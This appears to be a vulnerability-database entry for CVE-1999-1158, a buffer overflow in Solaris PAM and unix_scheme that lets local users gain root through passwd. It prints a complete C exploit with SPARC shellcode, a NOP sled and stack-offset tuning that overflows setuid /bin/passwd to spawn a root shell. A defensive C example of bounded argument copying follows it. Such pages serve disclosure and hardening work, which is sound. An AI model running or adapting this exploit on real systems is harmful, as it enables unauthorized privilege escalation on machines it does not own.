Solaris pluggable authentication module (PAM), unix_scheme vulnerability

Vulnerability ID: 1105284    Vulnerability type: Buffer overflow
Published: 1997-02-25    Updated: 1997-05-13
CVE ID: CVE-1999-1158
CNNVD ID: CNNVD-199705-013
Platform: Solaris    CVSS score: 7.2
|Sources
https://www.exploit-db.com/exploits/19158
https://www.securityfocus.com/bid/83036
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199705-013
|Details
Vulnerabilities exist in (1) the pluggable authentication module (PAM) on Solaris 2.5.1 and 2.5 and (2) unix_scheme on Solaris 2.4 and 2.3. A local user can gain root privileges through programs that use these modules, such as passwd, yppasswd and nispasswd.
|Exploit
/*
source: http://www.securityfocus.com/bid/201/info

There is a buffer overflow condition on arguments in Pluggable Authentication Modules (PAM) and unix_scheme (5.4 and 5.3). Therefore, an unauthorized user could exploit this vulnerability via the passwd program to gain root access. Under SunOS 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, yppasswd and nispasswd are hard links to the passwd program and therefore are also vulnerable. Under SunOS 5.4 and 5.3, passwd, yppasswd, and nispasswd are separate programs but they dynamically link unix_scheme and are affected. 
*/

/*
This is for Solaris 2.5.(1) !
With argv[1] you can modify the stack offset (+-500) if you have troubles
...
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strlen */
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH      1100
#define EXTRA           1200
#define STACK_OFFSET    3800
#define SPARC_NOP       0xa61cc013

u_char sparc_shellcode[] =
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff"
;

/* Return the current stack pointer; on SPARC %i0 is the return register. */
u_long get_sp(void)
{
  __asm__("mov %sp,%i0 \n");
}

int main(int argc, char *argv[])
{
  char buf[BUF_LENGTH + EXTRA];
  long targ_addr;
  u_long *long_p;
  u_char *char_p;
  int i, code_length = strlen(sparc_shellcode),dso=0;

  if(argc > 1) dso=atoi(argv[1]);

  long_p = (u_long *) buf;
  targ_addr = get_sp() - STACK_OFFSET - dso;

  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

  char_p = (u_char *) long_p;

  for (i = 0; i < code_length; i++)
    *char_p++ = sparc_shellcode[i];

  long_p = (u_long *) char_p;


  for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ =targ_addr;

  printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
         targ_addr, BUF_LENGTH, EXTRA, STACK_OFFSET);
  execl("/bin/passwd", "passwd", buf, (char *) 0);
  perror("execl failed");
  return 1;
}
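The bug class behind this record is a command-line argument copied into a fixed-size stack buffer without a length check. The following is an added illustration, not code from the page or from Sun: it shows the unchecked pattern in a comment and beside it a bounded copy plus an argument validator of the kind a setuid program can run before touching argv. The cap MAX_ARG_LEN and the function names are hypothetical; the oversized test input is constructed to match the exploit's BUF_LENGTH + EXTRA.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical cap on one command-line argument; the real limit is
 * whatever the program's own buffer can hold. */
#define MAX_ARG_LEN 256

/*
 * The pattern behind this class of bug (not compiled here):
 *
 *     char buf[256];
 *     strcpy(buf, argv[1]);   // no length check: an argument longer than
 *                             // 255 bytes runs past buf and over the saved
 *                             // return address on the stack
 *
 * A setuid program that does this hands its privileges to whoever
 * controls the argument.
 */

/* Hardened form: copy only if the whole argument plus its terminator
 * fits; otherwise leave dst as an empty string and report failure.
 * Returns 0 on success, -1 if the argument is too long. */
int copy_arg_checked(char *dst, size_t cap, const char *src)
{
    size_t n = strlen(src);

    if (cap == 0)
        return -1;
    if (n >= cap) {          /* no room for n bytes plus '\0' */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1); /* includes the terminating NUL */
    return 0;
}

/* Returns 1 if every argument in argv[1..argc-1] fits in cap bytes
 * (terminator included), 0 otherwise. A privileged program can reject
 * its input here before any argument reaches a fixed buffer. */
int args_within_limit(int argc, char *argv[], size_t cap)
{
    int i;
    for (i = 1; i < argc; i++)
        if (strlen(argv[i]) >= cap)
            return 0;
    return 1;
}

/* Constructed input sized like the exploit's buffer: BUF_LENGTH + EXTRA
 * (1100 + 1200) bytes of filler. Returns copy_arg_checked's result,
 * or -2 if allocation fails. */
int demo_oversized_argument(void)
{
    enum { LEN = 1100 + 1200 };
    char *arg = malloc(LEN + 1);
    char dst[MAX_ARG_LEN];
    int rc;

    if (arg == NULL)
        return -2;
    memset(arg, 'A', LEN);
    arg[LEN] = '\0';
    rc = copy_arg_checked(dst, sizeof dst, arg);
    free(arg);
    return rc;
}

/* A normal-sized argument is copied intact. Returns 0 on success. */
int demo_normal_argument(void)
{
    char dst[MAX_ARG_LEN];
    const char *arg = "alice";   /* constructed sample username */

    if (copy_arg_checked(dst, sizeof dst, arg) != 0)
        return -1;
    return strcmp(dst, arg);
}

int main(int argc, char *argv[])
{
    printf("oversized argument rejected: %s\n",
           demo_oversized_argument() == -1 ? "yes" : "no");
    printf("normal argument copied:      %s\n",
           demo_normal_argument() == 0 ? "yes" : "no");
    printf("argv within limit:           %s\n",
           args_within_limit(argc, argv, MAX_ARG_LEN) ? "yes" : "no");
    return 0;
}
```

The check is deliberately placed on the length of the input rather than on the address the overflow would reach: the bounded copy fails closed for any argument that does not fit, so the stack offset tuning the exploit relies on has nothing to overwrite.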
|Affected products
Sun Solaris 2.5.1

Sun Solaris 2.5

Sun Solaris 2.4

Sun Solaris 2.3

|References

Source: SUN
Name: 00139
Link: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/139&type=0&nav=sec.sba
Source: AUSCERT
Name: AA-97.09
Link: ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-97.09.Solaris.passwd.buffer.overrun.vul